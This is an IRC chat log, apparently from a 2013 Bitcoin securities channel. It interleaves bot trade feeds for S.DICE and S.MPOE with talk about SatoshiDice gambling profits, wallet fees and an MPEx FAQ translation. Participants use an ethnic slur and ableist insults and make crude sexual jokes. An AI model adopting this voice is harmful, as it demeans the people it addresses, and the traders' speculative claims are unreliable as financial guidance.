59 @ 0.0089 = 0.5251 BTC [+] Jan 22 22:30:03 [MPEX] [S.MPOE] 21839 @ 0.00061156 = 13.3559 BTC [+] Jan 22 22:30:05 [MPEX] [S.MPOE] 11606 @ 0.00061894 = 7.1834 BTC [+] Jan 22 22:30:07 [MPEX] [S.MPOE] 16700 @ 0.00061925 = 10.3415 BTC [+] Jan 22 22:30:08 [MPEX] [S.MPOE] 20567 @ 0.00061941 = 12.7394 BTC [+] Jan 22 22:30:10 [MPEX] [S.MPOE] 6000 @ 0.00062078 = 3.7247 BTC [+] Jan 22 22:30:11 [MPEX] [S.MPOE] 16488 @ 0.00062092 = 10.2377 BTC [+] Jan 22 22:30:13 [MPEX] [S.DICE] 2550 @ 0.00517014 = 13.1839 BTC [-] Jan 22 22:30:15 [MPEX] [S.DICE] 450 @ 0.0051843 = 2.3329 BTC [+] Jan 22 22:32:03 [HAVELOCK] [SDICE] 20 @ 0.548 = 10.96 BTC [-] Jan 22 22:32:05 [HAVELOCK] [SDICE] 11 @ 0.548 = 6.028 BTC [-] Jan 22 22:34:38 dub: But! Are you excited about... MY lunch? Jan 22 22:39:02 [HAVELOCK] [SDICE] 7 @ 0.549999 = 3.85 BTC [+] Jan 22 22:40:46 [MPEX] [S.DICE] 450 @ 0.0051843 = 2.3329 BTC [+] Jan 22 22:40:48 [MPEX] [S.DICE] 1550 @ 0.00521997 = 8.091 BTC [+] Jan 22 22:41:27 typically there is pr0n in google images for santa fe rice Jan 22 22:42:33 looks pretty good though, the food that is Jan 22 22:43:02 [HAVELOCK] [SDICE] 20 @ 0.548 = 10.96 BTC [-] Jan 22 22:43:02 kinda like a beaner pilaf Jan 22 22:45:35 so, beware the hole in mpex foyer everyone :D Jan 22 22:46:06 wat? Jan 22 22:46:08 "Altogether, Avalon’s first batch is expected to contribute a total of 18 TH/s to the Bitcoin network – about eighty percent of the network’s entire hash power at the time of Avalon’s shipping." Jan 22 22:46:15 80%? Jan 22 22:46:22 dub, http://trilema.com/2013/rota-post-mortem/#comment-91531 Jan 22 22:46:54 80? Jan 22 22:46:56 the fuck? Jan 22 22:46:57 math is wrong? Jan 22 22:47:02 we're at what, 25th atm? Jan 22 22:47:37 goddamnit sipa Jan 22 22:47:52 http://bitcoin.sipa.be/speed.png Jan 22 22:48:12 I have no clue where we are Jan 22 22:48:24 but its at least 18 Jan 22 22:48:47 [MPEX] [S.MPOE] 13212 @ 0.00062092 = 8.2036 BTC [+] Jan 22 22:49:34 22 Jan 22 22:52:03 some real cat and mouse shit going on with the bid/asks right now Jan 22 22:57:19 jurov: thats fine imo, we're in the wild west, there is no low requiring fenced holes Jan 22 22:57:26 s/low/law Jan 22 22:58:56 jurov: if a shop wants to make it very dangerous to go in and buy something, while its at odds with having customers, I don't have a problem with it Jan 22 23:02:09 jurov: at any rate its good for coinbr! Jan 22 23:02:44 i don't want to argue about it. just that i found the whole philosophy of placing pitfalls without a good reason just cause this is free country ... er.. lacking Jan 22 23:03:19 [MPEX] [S.MPOE] 5688 @ 0.00062267 = 3.5417 BTC [+] Jan 22 23:03:21 [MPEX] [S.MPOE] 15212 @ 0.00060309 = 9.1742 BTC [-] Jan 22 23:04:18 well theres certainly a questionable service paradigm there, if the aim is bringing in more business Jan 22 23:04:38 but thats not unexpected here Jan 22 23:05:10 [MPEX] [S.MPOE] 11815 @ 0.00062269 = 7.3571 BTC [+] Jan 22 23:06:27 !ticker h sdice Jan 22 23:06:29 [HAVELOCK:SDICE] 1D: 0.51000000 / 0.53911573 / 0.56000000 (114 shares, 61.45919280 BTC), 7D: 0.48000000 / 0.54273436 / 0.62000000 (547 shares, 296.87569270 BTC), 30D: 0.37000000 / 0.46498635 / 0.62000000 (4053 shares, 1884.58969268 BTC) Jan 22 23:07:10 and it isn't necessarily good for coinbr..next time some lunatic decides to call statjson 10x in second and mircea decides to add a fee to it Jan 22 23:07:44 or otherwise drop a hammer Jan 22 23:08:03 yes but thats not a new problem Jan 22 23:08:43 ofc. but such kind of "solutions" unnerves me. Jan 22 23:08:59 [MPEX] [S.MPOE] 6127 @ 0.00062913 = 3.8547 BTC [+] Jan 22 23:08:59 understandably Jan 22 23:09:00 [MPEX] [S.MPOE] 8395 @ 0.00062971 = 5.2864 BTC [+] Jan 22 23:10:06 I'm not even sure how to send an exact amount of bitcoins myself Jan 22 23:10:18 doesn't seem to be any way to reliably predict the fee Jan 22 23:10:46 do you use a client that subtracts the fee from sent amount? O_o Jan 22 23:11:07 i hope not Jan 22 23:11:09 I use bitcoind which I thing does that yes Jan 22 23:11:14 think* Jan 22 23:11:18 no it doesn't Jan 22 23:11:45 you do sendtoaddress
0.12345678 Jan 22 23:11:57 and it does send it exactly Jan 22 23:12:01 [HAVELOCK] [SDICE] 13 @ 0.54999979 = 7.15 BTC [+] Jan 22 23:12:02 plus fees Jan 22 23:12:28 righto, I am mistaken Jan 22 23:12:44 (sure I've hit this problem before but I don't have access to txn history at the moment Jan 22 23:13:02 [HAVELOCK] [SDICE] 4 @ 0.5499998 = 2.2 BTC [+] Jan 22 23:14:02 [HAVELOCK] [SDICE] 3 @ 0.555 = 1.665 BTC [+] Jan 22 23:14:14 and if you have less than 0.12345678 + fee in the wallet it disallows you to send anything Jan 22 23:17:08 [MPEX] [S.MPOE] 5285 @ 0.0006228 = 3.2915 BTC [-] Jan 22 23:17:13 [MPEX] [S.MPOE] 19307 @ 0.0006174 = 11.9201 BTC [-] Jan 22 23:17:19 [MPEX] [S.MPOE] 8575 @ 0.0006105 = 5.235 BTC [-] Jan 22 23:18:00 unsure where I got this misconception from, but I've been overpaying people to compensate for a while :) Jan 22 23:18:32 lol Jan 22 23:18:52 [MPEX] [S.DICE] 5000 @ 0.00521996 = 26.0998 BTC [-] Jan 22 23:19:35 [BTCTC] [ESECURITYSABTC] 5 @ 0.6985 = 3.4925 BTC [-] Jan 22 23:23:03 [HAVELOCK] [SDICE] 13 @ 0.53 = 6.89 BTC [-] Jan 22 23:23:04 [HAVELOCK] [SDICE] 7 @ 0.53 = 3.71 BTC [-] Jan 22 23:24:09 [BTCTC] [BASIC-MINING] 4 @ 0.34 = 1.36 BTC [+] Jan 22 23:26:48 Anyone would be willing to lend some BTCTC assets? I'm looking into short selling Jan 22 23:29:08 are you trying to pull mp on someone else Jan 22 23:29:26 pull a mp i should say. Jan 22 23:30:37 define a mp? Jan 22 23:35:02 [MPEX] [S.MPOE] 9602 @ 0.00062015 = 5.9547 BTC [+] Jan 22 23:37:43 ? Jan 22 23:38:26 maek a lot of monyz ? Jan 22 23:38:47 by the way, if anyone speaks any chinese : here's a draft of mpex faq http://mpex.co/faq_cn.html Jan 22 23:38:57 i would much appreciate any input. Jan 22 23:39:09 since i can't read that language. Jan 22 23:39:41 Well I'd probably offer better terms than you on contracts. Jan 22 23:40:59 actually i imagine that'll become quite the lucrative market in the future. Jan 22 23:41:14 prolly end up more or less standardized by practice etc. Jan 22 23:45:03 [HAVELOCK] [SDICE] 17 @ 0.53000001 = 9.01 BTC [+] Jan 22 23:45:27 Is anyone else watching the MONSTER betting that has been going on all day on SDice? Jan 22 23:46:29 No Jan 22 23:47:52 [MPEX] [S.MPOE] 1855 @ 0.00062971 = 1.1681 BTC [+] Jan 22 23:47:53 [MPEX] [S.MPOE] 10524 @ 0.00062988 = 6.6289 BTC [+] Jan 22 23:49:39 [MPEX] [S.DICE] 10000 @ 0.00521995 = 52.1995 BTC [-] Jan 22 23:49:41 [MPEX] [S.DICE] 5000 @ 0.00521996 = 26.0998 BTC [+] Jan 22 23:49:42 [MPEX] [S.DICE] 3550 @ 0.00523288 = 18.5767 BTC [+] Jan 22 23:49:44 [MPEX] [S.DICE] 10000 @ 0.005235 = 52.35 BTC [+] Jan 22 23:50:04 Oh, you wanted to sell your stocks, I get it now ; P Jan 22 23:50:58 no that was me buying Jan 22 23:51:17 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Jan 22 23:51:23 ;;ticker Jan 22 23:51:23 BTCUSD ticker | Best bid: 17.30001, Best ask: 17.38900, Bid-ask spread: 0.08899, Last trade: 17.48000, 24 hour volume: 61713.28463152, 24 hour low: 16.51001, 24 hour high: 17.59000, 24 hour vwap: 17.10409 Jan 22 23:52:36 Eh, not sure. Jan 22 23:52:49 Seems like the earnings are still low for the month Jan 22 23:52:55 [MPEX] [S.MPOE] 11648 @ 0.00062015 = 7.2235 BTC [-] Jan 22 23:52:57 [MPEX] [S.MPOE] 18352 @ 0.0006195 = 11.3691 BTC [-] Jan 22 23:54:50 [MPEX] [S.DICE] 7500 @ 0.00528204 = 39.6153 BTC [+] Jan 22 23:54:52 [MPEX] [S.DICE] 3421 @ 0.00529131 = 18.1016 BTC [+] Jan 22 23:55:17 [MPEX] [S.MPOE] 2748 @ 0.0006195 = 1.7024 BTC [-] Jan 22 23:58:34 Bugpowder how much ? Jan 22 23:59:03 [MPEX] [S.DICE] 6479 @ 0.00529131 = 34.2824 BTC [+] Jan 22 23:59:05 [MPEX] [S.DICE] 4300 @ 0.00529249 = 22.7577 BTC [+] Jan 22 23:59:06 [MPEX] [S.DICE] 141 @ 0.00534347 = 0.7534 BTC [+] Jan 22 23:59:07 [MPEX] [S.DICE] 2080 @ 0.00534611 = 11.1199 BTC [+] Jan 22 23:59:23 Enough that there will be a ~500 BTC dividend this month, so far Jan 22 23:59:28 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=100&status=ALL much better link. 1/4 of the page is today. Jan 22 23:59:38 [MPEX] [S.MPOE] 8372 @ 0.00061258 = 5.1285 BTC [-] Jan 22 23:59:44 0.00005 per share Jan 23 00:00:03 1% for the month Jan 23 00:00:06 lol Jan 23 00:00:13 buncha 1200 wins too Jan 23 00:00:13 Could still go up or down Jan 23 00:00:17 Since Dooglases update Jan 23 00:00:25 which was already sdice catching up Jan 23 00:00:40 I calculate 10,000BTC profit Jan 23 00:00:44 additional Jan 23 00:00:47 for jan ?! Jan 23 00:00:55 for the last 5 hours Jan 23 00:01:04 err 3 hours Jan 23 00:01:19 31000 in Jan 23 00:01:25 21000 out s Jan 23 00:01:49 o.o Jan 23 00:01:49 since block 217598 Jan 23 00:02:12 [MPEX] [S.DICE] 120 @ 0.00534611 = 0.6415 BTC [+] Jan 23 00:02:14 [MPEX] [S.DICE] 57 @ 0.00535581 = 0.3053 BTC [+] Jan 23 00:02:14 which puts us at 14,000 for the month Jan 23 00:02:15 [MPEX] [S.DICE] 634 @ 0.00538043 = 3.4112 BTC [+] Jan 23 00:02:16 [MPEX] [S.DICE] 4940 @ 0.00579999 = 28.652 BTC [+] Jan 23 00:02:32 So 1400? 2.8% Jan 23 00:02:37 14000 Jan 23 00:02:44 ;;calc 14 / 0.00579999 Jan 23 00:02:44 2413.79726517 Jan 23 00:02:45 I'm talking for MPEx Jan 23 00:02:52 which is 10% of shares Jan 23 00:02:59 yah Jan 23 00:03:04 2.4. still pretty huge for a month Jan 23 00:03:07 We're closer to 6... more like 2.33% Jan 23 00:03:08 well Jan 23 00:03:11 dudeds Jan 23 00:03:21 the betting is ongoing Jan 23 00:03:38 Could be up another 10k in a few hours Jan 23 00:03:43 or back down. Jan 23 00:03:44 if it keeps up sure Jan 23 00:03:59 i suspekt sdice is spearheading azn bitcoin adoption Jan 23 00:04:16 azn? Jan 23 00:04:20 asian Jan 23 00:04:30 ah Jan 23 00:05:02 [HAVELOCK] [SDICE] 10 @ 0.53 = 5.3 BTC [-] Jan 23 00:05:04 [HAVELOCK] [SDICE] 3 @ 0.53 = 1.59 BTC [-] Jan 23 00:05:05 [HAVELOCK] [SDICE] 7 @ 0.52 = 3.64 BTC [-] Jan 23 00:05:15 lol srsly. Jan 23 00:06:48 [BTCTC] [GSDPT] 3000 @ 0.0054 = 16.2 BTC [+] Jan 23 00:08:26 Well darn... I'd need someone to loan me some funds then... Jan 23 00:08:33 dub: What the heck porn are you talking about? I went to go look, but.. only saw food. And my safesearch is off..? Jan 23 00:09:15 [MPEX] [S.MPOE] 17950 @ 0.0006105 = 10.9585 BTC [-] Jan 23 00:09:59 [MPEX] [S.MPOE] 7330 @ 0.00061258 = 4.4902 BTC [+] Jan 23 00:09:59 [MPEX] [S.MPOE] 5120 @ 0.00061636 = 3.1558 BTC [+] Jan 23 00:10:26 midnightmagic: safesearch on, logged out, on a machine that has never searched for porn Jan 23 00:11:21 dub: Virus! Jan 23 00:11:30 Or at least link. Jan 23 00:11:51 midnightmagic: you know google 'bubbles' results based on a bunch of shit right? Jan 23 00:12:09 I guess either my coworkers or fellow countrymen in general are dirty bastards Jan 23 00:12:48 dub: Is any of it any good? Jan 23 00:14:56 IE17 dominates the competition: http://ie.microsoft.com/testdrive/performance/bubbles/ Jan 23 00:16:26 hrm safesearch is off, wtf Jan 23 00:16:42 google doesnt support hyperlinks so.. Jan 23 00:19:16 its a set of tits in some kind of artsy soft focus carry on Jan 23 00:19:48 a few hits for some kind of rodent as well Jan 23 00:33:27 http://trilema.com/2013/rota-post-mortem/ - i wonder how this correlates to the 519.704 BTC I got randomly Jan 23 00:33:36 I'd say 1 to 1 Jan 23 00:34:06 ? Jan 23 00:35:00 dude is retarded Jan 23 00:36:39 Is he stubbornly adhering to his rules & contracts? (regardless of legality) Jan 23 00:37:09 thebutterzone is retarded Jan 23 00:37:30 ah Jan 23 00:37:54 I should pay more attention. Jan 23 00:38:01 how the fuck can you draw any relationship between that post and randomly receiving btc yourself Jan 23 00:38:45 No idea. I haven't read that. Jan 23 00:38:47 what is he talking about Jan 23 00:38:55 I always have 0 credits Jan 23 00:39:08 i'm guessing he received 519.704 BTC from MPEX Jan 23 00:39:20 or he is trolling Jan 23 00:40:41 [BTCTC] [BASIC-MINING] 10 @ 0.34 = 3.4 BTC [+] Jan 23 00:40:44 no no, i think he did actually just randomly receive the btc from somewhere. at least iirc from reading otc Jan 23 00:41:00 but, whatever. Jan 23 00:41:47 [BTCTC] [MININGCO.ETF] 5 @ 0.5 = 2.5 BTC Jan 23 00:42:11 Satoshi Dice up another 1000 in the last 10 minutes Jan 23 00:42:13 [BTCTC] [COGNITIVE] 3 @ 0.3799 = 1.1397 BTC [-] Jan 23 00:42:25 I think we are now at ~15,000 profit for the month Jan 23 00:42:47 If I mashup the recent talking, you're all suggesting I should hack satoshidice.com and replace betting addresses with some of my own and somehow "randomly receive BTC from somewhere"? Jan 23 00:45:20 heheh Jan 23 00:45:45 only if you dig a big hole first Jan 23 00:46:03 [MPEX] [S.MPOE] 8211 @ 0.0006105 = 5.0128 BTC [-] Jan 23 00:46:58 hah Jan 23 00:47:03 [MPEX] [S.MPOE] 9400 @ 0.00060764 = 5.7118 BTC [-] Jan 23 00:48:09 [BTCTC] [MININGCO.ETF] 2 @ 0.5 = 1 BTC Jan 23 00:48:43 [BTCTC] [BASIC-MINING] 10 @ 0.34 = 3.4 BTC [+] Jan 23 00:51:37 [MPEX] [S.MPOE] 16300 @ 0.00060731 = 9.8992 BTC [-] Jan 23 00:51:55 !ticker m s.dice Jan 23 00:51:57 [MPEX:S.DICE] 1D: 0.00507549 / 0.00525598 / 0.00579999 (109410 shares, 575.06 BTC), 7D: 0.00454703 / 0.00489723 / 0.00598999 (1391696 shares, 6,815.47 BTC), 30D: 0.00332178 / 0.0041661 / 0.00598999 (9555800 shares, 39,810.47 BTC) Jan 23 00:52:20 ;;calc 1500/52559 Jan 23 00:52:20 0.0285393557716 Jan 23 00:56:50 [BTCTC] [COGNITIVE] 5 @ 0.38 = 1.9 BTC [+] Jan 23 00:57:46 [MPEX] [O.BTCUSD.P150T] 614 @ 0.00703848 = 4.3216 BTC [-] Jan 23 00:57:47 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.01758122 = 17.5812 BTC [-] Jan 23 00:58:44 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.35779533 = 357.7953 BTC [+] Jan 23 00:58:57 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.29914036 = 299.1404 BTC [+] Jan 23 00:59:59 jcpham: thebutterzone got some btc sent to him around christmas/new years. at the same time other people in #bitcoin-otc were allegedly being given various sums from someone ranging up to about 200-300btc Jan 23 01:00:14 i see Jan 23 01:00:19 i was unaware of this Jan 23 01:01:06 he posted in bitcointalk but no one owned up to sending it, either on purpose or in error. How he then got to the rota, I haven't a clue. Jan 23 01:01:32 i think it was a joke Jan 23 01:05:30 [BTCTC] [BASIC-MINING] 6 @ 0.34 = 2.04 BTC [+] Jan 23 01:07:20 [BTCTC] [COGNITIVE] 10 @ 0.38 = 3.8 BTC [+] Jan 23 01:08:52 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 23 01:08:54 ahh markedathome Jan 23 01:09:47 mircea_popescu: seems like http://mpex.co/faq_cn.html's encoding is broken, doesn't work with in header stated utf-8, nor with any of the chinese Jan 23 01:10:05 mircea_popescu: it is utf-8 though if the copy&paste error is fixed Jan 23 01:10:28 FabianB what error is that ? Jan 23 01:11:05 o i think i see Jan 23 01:11:09 mircea_popescu: Jan 23 01:11:38 now ? Jan 23 01:11:50 html tag wrongly delcared it as english Jan 23 01:12:43 !ticker m S.MPOE Jan 23 01:12:44 [MPEX:S.MPOE] 1D: 0.00059541 / 0.00061157 / 0.00062988 (2609382 shares, 1,595.84 BTC), 7D: 0.00059541 / 0.00064102 / 0.00068 (11134418 shares, 7,137.43 BTC), 30D: 0.00059541 / 0.00064462 / 0.00068 (39225798 shares, 25,285.89 BTC) Jan 23 01:12:45 ;;ticker Jan 23 01:12:46 BTCUSD ticker | Best bid: 17.36002, Best ask: 17.40000, Bid-ask spread: 0.03998, Last trade: 17.36002, 24 hour volume: 59877.57089900, 24 hour low: 16.65000, 24 hour high: 17.59000, 24 hour vwap: 17.13945 Jan 23 01:12:58 so why the sudden price jump? Jan 23 01:13:11 a dollar a day keeps recession at bay. Jan 23 01:13:21 i feel like this is an aftershock of the reward half Jan 23 01:14:46 mircea_popescu: nope, that's not the problem, there are some escape characters in the html tags Jan 23 01:14:53 FabianB looking. Jan 23 01:14:56 wow bitcoin is in headlines no wonder: First up is the venerable SatoshiDice, which is the leading bitcoin gambling site in terms of amount wagered. Responsible for more than 50% of daily network volume on the Bitcoin blockchain, SatoshiDice reported first year earnings from wagering at an impressive .33,310. Jan 23 01:15:06 i found/replaced them with an editor, after that works fine here Jan 23 01:15:15 which then ? Jan 23 01:15:25 And January earnings of 15,000 to date Jan 23 01:15:26 :) Jan 23 01:15:34 Bugpowder you saw forbes piece btw ? Jan 23 01:15:45 yah Jan 23 01:15:48 awesome Jan 23 01:15:52 congrats Jan 23 01:16:18 "To invest in the operator and bet on the house, SatoshiDice shares are traded on the MPEx bitcoin stock exchange under ticker symbol S.DICE (see August 19th, 2012 Prospectus). At the current exchange rate of $17.00 per BTC, SatoshiDice is a company valued at $8.9 million." Jan 23 01:16:37 o i c Jan 23 01:16:41 mPex is no longer mainstreeeam. Jan 23 01:18:13 mPex is no longer underground it is now mainstream Jan 23 01:18:18 * Jan 23 01:18:22 how does that make you feel mircea_popescu ? Jan 23 01:18:36 FabianB ok, was bad file encoding. check now ? Jan 23 01:18:53 thestringpuller ummm... i dunno. Jan 23 01:18:57 mircea_popescu: jup, looks much better and readable now :) Jan 23 01:19:00 [BTCTC] [COGNITIVE] 4 @ 0.38 = 1.52 BTC [+] Jan 23 01:19:07 :) ty! can you actually read chinese ? Jan 23 01:20:10 Smoovious: ;;seen smickles Jan 23 01:20:13 [BTCTC] [BASIC-MINING] 5 @ 0.34 = 1.7 BTC [+] Jan 23 01:20:14 blah Jan 23 01:20:19 ;;seen smickles Jan 23 01:20:19 smickles was last seen in #bitcoin-assets 7 hours, 17 minutes, and 15 seconds ago: what was the final precursor last time? a bunch of puts bought, calls sold? Jan 23 01:20:24 mircea_popescu: i know some chinese, but not enought to verify if it's a good translation Jan 23 01:21:39 15000 BTC earnings? Looking good. Jan 23 01:22:41 they have been killing it in the last few hours Jan 23 01:22:43 crazy stuff Jan 23 01:22:55 mircea_popescu: but your new sentence is missing (the red one from yesterday) Jan 23 01:22:59 still betting? Jan 23 01:23:16 FabianB o shit. ya, translator was at work on old version obviously >< Jan 23 01:23:29 I'll wait for the next report from dooglus Jan 23 01:23:39 not for the last 23 minutes Jan 23 01:23:49 the addressess still have over 10,000 left in them though Jan 23 01:24:14 mircea_popescu: shouldn't be a problem for him to add this one sentence Jan 23 01:24:15 pizza delivery boy Jan 23 01:24:24 kakobrekla lol Jan 23 01:24:24 [MPEX] [S.MPOE] 39 @ 0.00060764 = 0.0237 BTC [+] Jan 23 01:24:27 FabianB indeed. Jan 23 01:24:52 at least 16,000 left actually Jan 23 01:24:58 so, anyone here fluent in russian ? german ? french ? Jan 23 01:25:08 spanish ? Jan 23 01:25:10 mircea_popescu: looks like the translater offers chinese support for mpex in the faq Jan 23 01:25:18 FabianB yeh Jan 23 01:25:30 mircea_popescu: i'm german Jan 23 01:25:40 a ? wanna do a german faq ? Jan 23 01:26:40 elance.com Jan 23 01:26:50 [MPEX] [S.DICE] 300 @ 0.00541028 = 1.6231 BTC [-] Jan 23 01:26:50 cheep Jan 23 01:27:27 i don't have an account. and besides, i'd prefer ppl from teh community Jan 23 01:27:30 the bad part about is keeping all the langs updated later on Jan 23 01:27:39 [MPEX] [S.DICE] 23 @ 0.00541028 = 0.1244 BTC [-] Jan 23 01:27:47 mircea_popescu: amir knows esperanto Jan 23 01:27:48 kakobrekla im sort of hoping the faq is done. Jan 23 01:28:05 dub willywonka-tellmemore.jpg Jan 23 01:28:37 i can try to find the time on weekend Jan 23 01:29:23 FabianB don't feel pressured, it's purely an "if anyone wants to" thing Jan 23 01:29:50 i wouldn't want to offer support, like the chinese guy ;) Jan 23 01:30:41 (i don't even have an account, only using coinbr) Jan 23 01:30:46 german isn't quite the unbridgeable cultural and linguistic gap like chinese is, so i don't imagine it'd make so much sense Jan 23 01:30:57 dub lol Jan 23 01:30:59 Bugpowder : thanks for the SD sheet ! What a nice surprise today ! +8K Jan 23 01:31:10 [MPEX] [O.BTCUSD.C100T] 510 @ 0.41713552 = 212.7391 BTC [+] Jan 23 01:31:16 [MPEX] [S.MPOE] 16400 @ 0.00061105 = 10.0212 BTC [+] Jan 23 01:31:25 heh whoever had those calls is a rich boy. Jan 23 01:31:25 yah Jan 23 01:31:40 I got a few Jan 23 01:31:41 but anyway, it's funny, i think they translated "dear lord" as "dear king" Jan 23 01:31:55 not that my chinese is worth the mention. Jan 23 01:31:56 hehehe Jan 23 01:32:05 so it's Jan 23 01:32:13 "dear king, what is this ?" "it is dog" Jan 23 01:32:19 ROR Jan 23 01:32:42 mircea_popescu: lol, did you run it through google translate backwards? Jan 23 01:32:42 i'll end up with manga fanshit, whereby a dog asks a princess what this is a kingdog ?! Jan 23 01:33:09 seriously though... How does the dude that just lost $200,000 on Satoshi Dice today feel right now. Jan 23 01:33:23 sick Jan 23 01:33:28 大王 isnt that king ? Jan 23 01:33:35 [MPEX] [S.MPOE] 18380 @ 0.00061586 = 11.3195 BTC [+] Jan 23 01:33:36 [MPEX] [S.MPOE] 2852 @ 0.00061636 = 1.7579 BTC [+] Jan 23 01:33:51 Bugpowder: but maybe he made 225,000 yesterday! Jan 23 01:34:04 Bugpowder: probably like a dude that hat $200k to lose, indiferent Jan 23 01:34:08 mod6 i think we'd know about it Jan 23 01:34:24 mircea_popescu: right Jan 23 01:34:24 fair enough Jan 23 01:34:34 Bugpowder: did smickles confirm the receipt of those shares? Jan 23 01:34:41 I didn't ask him Jan 23 01:34:47 like my grand father say : day loss, eve gain Jan 23 01:34:49 he didn't asdk him, he told him. Jan 23 01:34:50 mod6 he didn't Jan 23 01:35:20 dub, yeah prob gonna take it out on a hired lady. Jan 23 01:35:24 or something Jan 23 01:35:46 maybe on a hired gentleboi Jan 23 01:36:06 it is dog? Jan 23 01:36:09 who is dog? Jan 23 01:36:17 lol Jan 23 01:36:19 this is. Jan 23 01:36:25 yes ? Jan 23 01:36:30 http://i2.kym-cdn.com/entries/icons/original/000/007/447/hello-yes-this-is-dog.png Jan 23 01:36:35 ? ^ that? Jan 23 01:36:48 hello yes that is dog. Jan 23 01:37:26 http://www.google.com/search?q=day+loss,+eve+gain&complete=0 Jan 23 01:37:34 my 1st is "The 60 Day Plan: How to Get Sexy by New Year's Eve ". Jan 23 01:37:36 tru story. Jan 23 01:37:54 google algo Jan 23 01:38:10 "Standings mechanics - EVElopedia - EVElopedia - EVE Online" Jan 23 01:38:12 my first is eve Jan 23 01:38:13 with your previous Jan 23 01:38:19 Standings mechanics - EVElopedia - EVElopedia - EVE Online Jan 23 01:38:24 lol Jan 23 01:38:25 I am already sexy Jan 23 01:38:25 anyway, yeah losses suck, but who's to say that's not his dip in his martingale chart Jan 23 01:38:29 don't need to search for it. Jan 23 01:38:35 sorry for the bad translation, sound's better in french :( Jan 23 01:38:43 mod6 track the betting addresses. Jan 23 01:39:13 error4733 say it in french ? Jan 23 01:39:22 http://blockchain.info/address/1EP4rM8hLZCRSWPNZDWJp9zdvmoWYkkgbQ Jan 23 01:39:26 jour de perte, veille de gain Jan 23 01:39:30 a Jan 23 01:39:31 ahh. well, im not saying you're incorrect. Jan 23 01:39:44 http://blockchain.info/charts/balance?address=1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Jan 23 01:39:46 if you lose todat that mean you will win tmrw... Jan 23 01:39:51 n Jan 23 01:39:52 no Jan 23 01:39:57 it means you lost it Jan 23 01:39:57 yeah, lose today, win in the morn. Jan 23 01:40:13 Bugpowder hater! Jan 23 01:40:33 hey you might win tomorroe Jan 23 01:40:37 or lose another 10k Jan 23 01:40:56 please do Jan 23 01:41:11 anyway, im off. take care all Jan 23 01:41:19 l8r Jan 23 01:41:22 for every 10K i win 2btc :) Jan 23 01:41:25 [MPEX] [S.MPOE] 16550 @ 0.00061241 = 10.1354 BTC [-] **** BEGIN LOGGING AT Wed Jan 23 06:37:08 2013 Jan 23 06:37:34 BTCT.co has nice features Jan 23 06:37:54 but they don't have S.DICE Jan 23 06:37:58 MPEx has less features and a high fee, but functions more like a stock exchange, not a brokerage platform. Jan 23 06:38:09 The transactions are much more secure. Jan 23 06:38:14 All gpg signed. Jan 23 06:38:28 coinbr.com is a broker for MPEx Jan 23 06:38:41 You can trade S.DICE/S.MPOE on it Jan 23 06:38:50 but they charge a bit more fees Jan 23 06:39:37 i'll pay the MPEx fees with the S.DICE div from jan Jan 23 06:39:44 Are you already on any platform at all? Jan 23 06:40:42 I'm on MPEX Jan 23 06:41:06 and really like it Jan 23 06:41:35 i'm glad we are more accesaible and this channel is getting more blind members Jan 23 06:42:03 12,100 BTC Jan 23 06:42:07 since doog Jan 23 06:43:08 I like the platform also Jan 23 06:44:05 The owner is a bit stubborn tho Jan 23 06:44:41 I see coinbr and they have a very nice UI. Jan 23 06:44:57 I'm sorry, coinbr doesn't have a nice UI. Jan 23 06:45:14 btct.co has a nice one Jan 23 06:48:33 [MPEX] [S.DICE] 64 @ 0.00526527 = 0.337 BTC [-] Jan 23 06:49:17 yeah. Different kind of stuff on it however. Jan 23 06:49:34 S.BVPS will be moving from MPEx to BTCT.co Jan 23 06:49:44 We're getting delisted from MPEx Jan 23 06:50:16 Previous owner of BitVPS did something not respecting the contract on MPEx (Selling his whole stake in BitVPS) Jan 23 06:50:38 Namworld: you are the owner of BitVPS? Jan 23 06:51:13 One of the co-owner. Jan 23 06:51:18 rg retired Jan 23 06:51:43 are you guys using openstack? Jan 23 06:55:19 no Jan 23 06:56:27 ;;ticker Jan 23 06:56:28 BTCUSD ticker | Best bid: 17.10000, Best ask: 17.15000, Bid-ask spread: 0.05000, Last trade: 17.10000, 24 hour volume: 64871.93999072, 24 hour low: 16.65000, 24 hour high: 17.59000, 24 hour vwap: 17.20845 Jan 23 06:56:33 what, still ?! Jan 23 06:57:43 they are trying to kill it Jan 23 06:57:50 who's they and what's it Jan 23 06:57:54 getting close Jan 23 06:58:21 they = sellers; it = 17+ Jan 23 06:58:26 a a Jan 23 06:58:43 ;;bids 17 Jan 23 06:58:46 There are currently 3619.4082 bitcoins demanded at or over 17.0 USD, worth 61628.2957349 USD in total. Jan 23 06:58:50 ;;asks 18 Jan 23 06:58:53 There are currently 20232.644 bitcoins offered at or under 18.0 USD, worth 355737.861722 USD in total. Jan 23 06:59:14 ;;bids 15 Jan 23 06:59:17 There are currently 42445.625 bitcoins demanded at or over 15.0 USD, worth 684798.563041 USD in total. Jan 23 06:59:21 ;;asks 20 Jan 23 06:59:24 There are currently 39413.116 bitcoins offered at or under 20.0 USD, worth 726890.468085 USD in total. Jan 23 06:59:36 they look like fail tho lol Jan 23 07:00:30 ;;bids 16 Jan 23 07:00:34 There are currently 27597.151 bitcoins demanded at or over 16.0 USD, worth 455044.787176 USD in total. Jan 23 07:01:43 oh my Jan 23 07:03:05 13000 profit Jan 23 07:03:36 still firing bets off at 4000 a shot Jan 23 07:03:59 every half hour Jan 23 07:04:10 automatic like ? Jan 23 07:04:22 no Jan 23 07:04:29 random delay Jan 23 07:04:40 it boggles. Jan 23 07:04:45 with them going out over the course of 2-3 minutes Jan 23 07:04:51 !help Jan 23 07:04:53 List of commands: Jan 23 07:04:53 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Jan 23 07:05:03 Chilca you go like Jan 23 07:05:06 !ticker m s.dice Jan 23 07:05:08 [MPEX:S.DICE] 1D: 0.00507549 / 0.00525447 / 0.00579999 (110702 shares, 581.68 BTC), 7D: 0.00454703 / 0.00492216 / 0.00598999 (1282457 shares, 6,312.47 BTC), 30D: 0.00332178 / 0.00416702 / 0.00598999 (9563029 shares, 39,849.40 BTC) Jan 23 07:05:16 mircea_popescu: you know me!! Jan 23 07:05:19 thanks Jan 23 07:05:43 i know 